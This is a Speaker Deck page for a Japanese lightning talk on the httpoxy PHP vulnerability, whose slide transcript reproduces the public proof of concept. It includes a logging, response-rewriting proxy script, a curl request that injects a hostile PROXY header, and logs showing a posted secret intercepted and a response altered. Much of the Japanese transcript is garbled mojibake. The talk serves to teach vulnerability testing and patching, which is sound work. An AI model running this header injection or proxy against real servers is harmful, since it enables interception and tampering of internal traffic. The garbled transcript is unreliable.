Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
Search
uzulla
July 20, 2016
Technology
10
5.9k
初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5
PHPBLT #5でほぼしゃべらなかったLTの資料です。
uzulla
July 20, 2016
Tweet
Share
More Decks by uzulla
See All by uzulla
あなたのアプリ、ログはでてますか?あるいはログをだしてますか? (Funabashi.dev用 軽量版)
uzulla
2
140
セッションのトークセッション / Traps for PHP session features in growing web apps
uzulla
2
93
Crafting a Own PHP - ウキウキ手作りミニマリストPHP
uzulla
5
1.8k
例外を投げるのをやめてみないか? あるいは受け入れてみないか? - How to use exceptions other than throwing
uzulla
4
820
PHPerが ISUCONでやるべき事
uzulla
1
630
開発生産性は上がらない - N Ways to Reduce Development Productivity
uzulla
1
180
test is not a job
uzulla
1
450
あなたのPHPアプリ、ログはでてますか?あるいはログをだしてますか? / Are you writing a log? Or just out a log?
uzulla
16
7.1k
有名FWを採用する?しない? 令和5年におけるオレオレフレームの立ち位置 / To make with own framework or not do, that is the question
uzulla
2
1k
Other Decks in Technology
See All in Technology
Platform Engineeringのエッセンスを小規模な開発組織に取り入れた事例紹介
ham0215
5
810
Introducing NgRx in an Nx Angular Workspace
fabiangosebrink
0
170
ダッシュボードが“使われる”ようにするための Tips を時間の限り紹介!
hanon52_
1
140
HashHub会社案内「なぜ今、パブリックブロックチェーンに賭けるのか」
hashhub
3
75k
Maps with Django - DjangoCon US 2024
pauloxnet
0
140
Amazon BedrockとPR-Agentでコードレビュー自動化に挑戦・実際に運用してみた
diggymo
0
440
仕事を前に進めるためのコツ - 判断と決断と共有 / Aim for the goal
soudai
60
22k
負債あるモノリスのオブザーバビリティに組織で向き合う
recruitengineers
PRO
8
270
Wasmコンテナを動かしてみた
stanaka26
0
150
Extending kotlin-inject for fun & profit
vrallev
0
120
脆弱性を管理して、ビジネスリスクに備えよう 〜駆け出しエンジニアがCVEとSBOMを可視化してみた〜
ktgrryt
0
160
低コストで実現する社内文書RAG機能を搭載したAIチャットボット開発
takapy
2
180
Featured
See All Featured
Bash Introduction
62gerente
608
210k
Faster Mobile Websites
deanohume
304
30k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
124
18k
Clear Off the Table
cherdarchuk
91
320k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
26
4k
StorybookのUI Testing Handbookを読んだ
zakiyama
26
5.1k
Robots, Beer and Maslow
schacon
PRO
157
8.2k
The World Runs on Bad Software
bkeepers
PRO
64
11k
Building Applications with DynamoDB
mza
90
6k
How GitHub Uses GitHub to Build GitHub
holman
472
290k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
90
16k
How to name files
jennybc
75
98k
Transcript
PHPBLT#5 Httpoxyͱ͔ͷ 20160720 uzulla
ࣗݾհ • Junichi Ishida aka uzulla • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢ • HachiojiͳΜͨΒͱ͔
• ͳΜͨΒHacjioji in ͱ͔
Httpoxy • https:/ /httpoxy.org/ • ࡉͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦ͷϦΫΤε τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ • ΞϓϦ͔Βଞͷαʔόʔͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ •
͋Δ͍ɺվ͟ΜͰ͖ΔՄೳੑ • ΈΜͳௐࠪࡁΈͩΑͶʂʁ • ʢΈΜͳ͍ͬͯͨΒϖʔδඈ͢ʣ
None
• ʮCLIͰΑ͋͘Δ༷ʯͱʮCGIͷ༷ʯͷিಥ͕ݪҼ • HTTP_PROXYڥมͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ ͕Α͋͘Δ • ΣϒΞϓϦʹʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣPHPͰ CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ • ͯ͞ɺCGIͷ༷Ͱʢྫ͑ʣHOGEͱ͍͏ϦΫΤετϔομ
ʔΛHTTP_HOGEڥมʹอଘ͢Δͷ͕ͩ…ɻ • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏ڥม͕ ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ
• CGIϦεϖΫτͳPHPmod_phpfastcgi͜ͷ༷ • ͳ͓ɺPHPࣗମ͜ͷ੬ऑੑӨڹ͠ͳ͍ • օେ͖file_get_contentsӨڹͳ͍ • ͕Μͬͯ࡞Γ͜·ͳ͚ΕӨڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ • HTTP_PROXYΛड͚ೖΕΔදతͳϥΠϒϥϦͱͯ͠guzzle
• 6.2.1Ͱमਖ਼ • guzzle࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠ΘΕ͍ͯ ΔɺͳͷͰʹͳͬͨͷͰͨ͠ʂ
ͳ͓… • ઃఆͰ͖ΔͷHTTP_PROXYڥมͰ͋ͬͯɺHTTPS_PROXY ڥมࢦఆͰ͖ͳ͍ • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ • ͭ·ΓɺͬऔΕΔͷHTTP • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
• େͷϠόΠใHTTPSͩΖ͏…ଟ…ɻ
ΦνͱͳΔରࡦ • !ΣϒαʔόͰɺPHPͷࣄલʹϔομʔΛམͱ͢ • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢ • ίʔυΛ͢ • ϥΠϒϥϦͷόʔδϣϯΞοϓ •
❌ʮίʔυઌ಄ͱ͔Ͱڥม্ॻ͖͢Ε͍͍ͷͰʁʯ ʮ೦ͳΒແཧͳͷͰ͢ʯ
͜͜·Ͱօ͞Μ͝ଘ͡ • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ • ʮࣗͰʯௐࠪରԠͯ͠·͔͢ʁ • ʮࣗͰʯීஈ͔Βใऩूͯ͠·͔͢ʁ •
ʢͳ͓ϑϦʔλʔݽಠͳͷͰવηϧϑαʔϏε…ʣ
ࢼͯ͠·͔͢ʁ • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ • ੬ऑੑࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ • ௨ৗࣗͰ࣮͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ ଟ͍ • Proof
of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ • ʢ࠷ۙࢮޠɿexploit codeʣ
ࢼͦ͏ʂ • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ
• PoCͲ͜ʹ͋Δ͔ʁ • CVEʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱͳ͍ɺͷͰ୳͢ • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ͍ΔͷͰ… • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢExploitʣઈରʹ࣮ߦ͢Δͳʂʂʂ • CVEͱ͔ʹͬͯΔౕେৎͩΖ͏͕ɺྑͷExploitഁ
յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ • ࠓճhttpoxy͕ެ։͍ͯͨ͠ • https:/ /github.com/httpoxy/php-fpm-httpoxy-poc
// ݩͷίʔυ͜ͷΑ͏ͳײ͡ // "guzzlehttp/guzzle": "~6.0" $client = new GuzzleHttp\Client(); $client->request(
'POST', 'http://my-internal-microservice.example.com/', ['secret' => 'some-really-secret-string'] ); echo "Request sent\n";
// ͦͷ··Ͱ͑ͳ͍ͷͰɺίʔυमਖ਼ // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ require 'vendor/autoload.php'; $client =
new GuzzleHttp\Client(); $res = $client->request( 'POST', 'http://127.0.0.1:8002/api.php?himi=tsu', ['form_params' => ['secret' => 'I_AM_PHPER']] ); echo $res->getBody();
API(?!)Λ࡞ <?php // api.php echo "BLT!BLT!";
ΞϓϦͱAPI(?!)Λىಈ $ composer install $ php -S 127.0.0.1:8001 index.php #
ผγΣϧͰ $ php -S 127.0.0.1:8002 api.php
ͨΊͯ͠ΈΔ $ curl 'http://localhost:8001/' BLT!BLT! • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK
ѱҙ͋ΔProxyΛ༻ҙ͢Δ • ͝ՈఉʹProxy͕͋Δํෆཁ • Charlesͱ͔ • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙͳʹ͕ϋϠϦͳͷʁ)
ѱҙ()͋ΔࡶͳproxyΛॻ͘ <?php $uri = $_SERVER['REQUEST_URI']; $body = file_get_contents('php://input'); $method =
$_SERVER['REQUEST_METHOD']; error_log($body); error_log(print_r($_SERVER,1)); require 'vendor/autoload.php'; $client = new GuzzleHttp\Client(); $res = $client->request($method, $uri, ['body' => $body]); echo $res->getBody();
ࡶͳProxyʹ͍ͭͯ • ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ • దʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ ʢproxy͔ͩΒͶ…ʣ • ͜ͷίʔυࡶͰةݥͳͷͰ࣮ݧҎ֎ʹઈରʹ͏ͳΑʂ • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ
ࡶͳproxy্ཱͪ͛ $ php -S 127.0.0.1:8003 proxy.php
࣮ࡍʹ੬ऑੑΛςετͩʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
• ʮ೦͜ΕͰ͏͖͝·ͤΜʯ • ͳΜͱbuiltin server ੬ऑੑ͕ͳ͍ʂ͆ • ͱ͍͏͜ͱͰɺ࡞apachehereΛ͔ͭ͏(ͳΜͰ͍͍͚Ͳ) • https:/
/github.com/uzulla/apachehere $ apachehere -p 8001 DocumentRoot : /xxx php-cgi open : http://127.0.0.1:8001/ <snip> [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php
ϦτϥΠʂ $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' BLT!BLT!
ޭ͢Δͱproxyͷϩάʹ… [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20
02:01:43 2016] Array ( [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc [REMOTE_ADDR] => 127.0.0.1 [REMOTE_PORT] => 53696 [SERVER_SOFTWARE] => PHP 7.0.3 Development Server [SERVER_PROTOCOL] => HTTP/1.1 [SERVER_NAME] => 127.0.0.1 [SERVER_PORT] => 8003 [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu [REQUEST_METHOD] => POST [SCRIPT_NAME] => /api.php [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php [PHP_SELF] => /api.php [QUERY_STRING] => himi=tsu [HTTP_HOST] => 127.0.0.1:8002 [HTTP_PROXY_CONNECTION] => Keep-Alive [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3 [CONTENT_TYPE] => application/x-www-form-urlencoded [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded [CONTENT_LENGTH] => 17 [HTTP_CONTENT_LENGTH] => 17 [REQUEST_TIME_FLOAT] => 1468947703.6871 [REQUEST_TIME] => 1468947703 )
[Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER [Wed Jul 20 02:01:43
2016] Array ( snip [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ
proxyΛमਖ਼͢Ε… // proxy.php //echo $res->getBody(); echo "ീԦࢠʂീԦࢠʂ"; • ͱमਖ਼ͯ͠ $
curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/' ീԦࢠʂീԦࢠʂ • վ͟ΜޭͰ͢Ͷʂ
ͱ͍͏͜ͱͰɺ • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷॏཁɺษڧʹͳΔ • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ
͋ͱɺ৻ॏʹͶʂ • ύονόʔδϣϯΛ͘Έ͍͚ͯͳ͍ • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮ʯ exception: php_sapi_name() has been disabled
for security reasons. It can be re-enabled by adding it to the google_app_engine.enable_functions ini variable in your applications php.ini • ʮGAE ͕ѱ͍ ͷ༷Ͱʁʯʮ͔ͨ͠ʹʯ
ͰυίͰΔ͔ʁ • օ͞ΜͲ͜Ͱͬͯ·͔͢ʁ
ΛΥον͠ଓ͚Δ • ໘͕ͩࣄͩʂ • TwitterͳͲSNSͰΔ • CVEͳͲΛߪಡ͢Δ • χϡʔεαΠτΛߪಡ͢Δ •
ެࣜϦϦʔεΛߪಡ͢Δ
TwitterͳͲSNS • ใੑ͕ߴ͍ɺ5ׂ͘Β͍͜͜ͰଘࡏΛΔࣄʹͳΔ • ʢPHPͷਓͰͳ͆͘ʣJSɺGoɺPerlΠϯϑϥํ໘ͳͲͷਓΛ ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ • ৄ͍͠ਓવʹ͢Δ͜ͱ͕ଟ͍͠ɺ ʢΘ͔͍ͬͯΔͷͰʣҰ࣍ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍
ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ • http:/ /jvn.jp/report/ • JVNɺຊޠɺ·͚ͣͩ͜͜Ͱྑ͍ʢͱࢥ͏ʣ • Feed͋ΔΑ • https:/
/www.jpcert.or.jp/ • JPCERTɺϝϧϚΨ͋ΔΑʂ
• https:/ /nvd.nist.gov/download.cfm • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར • CVE΄΅Ұ࣍ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ • https:/ /security.sensiolabs.org/database
• PHPϥΠϒϥϦͷใɺFeed͕͋ΔͷͰศར
ҰൠతͳχϡʔεαΠτ • ҰൠతͳITܥχϡʔεαΠτ…ຊจಡ·ͣʹ͙͢ʹϦϯΫઌ ͷҰ࣍ใݴͬͨํ͕ྑ͍…ɻ
• reddit֤छɺใੑߴ͍͕ίϝϯτ͙͢ʹ৴༻͠ͳ͍Α͏ʹ • https:/ /www.reddit.com/r/netsec • https:/ /www.reddit.com/r/sysadmin • https:/
/www.reddit.com/r/PHP • hackernewsɺ͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘ • https:/ /news.ycombinator.com/news
ެࣜαΠτ • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ • ͕͔͍ࣗͭͬͯΔϑϨʔϜϫʔΫϥΠϒϥϦPHPͷϦϦ ʔεͱ͔Έͯྑ͍ͷͰʁʁ
blog • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔ • ηΩϡϦςΟاۀͷϒϩάΑ͍ • વ͚ͩͲɺཏੑ͕ͳ͍ • ʮ୯ޠʯΛͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰΑ͍ •
झຯ͕ͰΔͷͰলུ
Branded Vulnerability ͳαΠτ • ࠷ۙΩϟονʔͳ໊લ͕͘ɺHttpoxyͦ͏ • GHOST,FREAK,POODLEʑ • ·ͱΊαΠτΈ͍ͨͳͷɺγΣΞ͘͢͠ΩϟονʔͳΞΠ ίϯ͕͋ͬͨΓͯ͠Α͍
• ଟ͘ͷ߹CVEΑΓΘ͔Γ͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ ͰOK͕ͩɺӳޠͰ͢ɻ • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱͳ͍ɺٯ·͔ͨ͠Γ
ใΩϟον·ͱΊ • ΥονʹRSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱͳ͍͆ʣ • JPCERTͱJVN͘Β͍ొͯ͠Α͍ͷͰ • Branded VulnerabilityͳαΠτ͕͋Ε·ͣνΣοΫ •
ӳޠ͕ॏཁʢʣ • ༁ղઆهࣄҰ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚ Ε߄ͯͣʹਖ਼࠲ͯͭ͜͠ͱ
That's all folks! • ੬ऑੑࣗͰͨΊͦ͏ʂ • χϡʔεΛͪΌΜͱݟΑ͏ʂ • ͪΌΜͱ੬ऑੑΛѲͯ͜͠ʂ •
Httpoxyɺ͋Μ·Γखͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ // enjoy ! $ grep -r HTTP_PROXY /your/codes/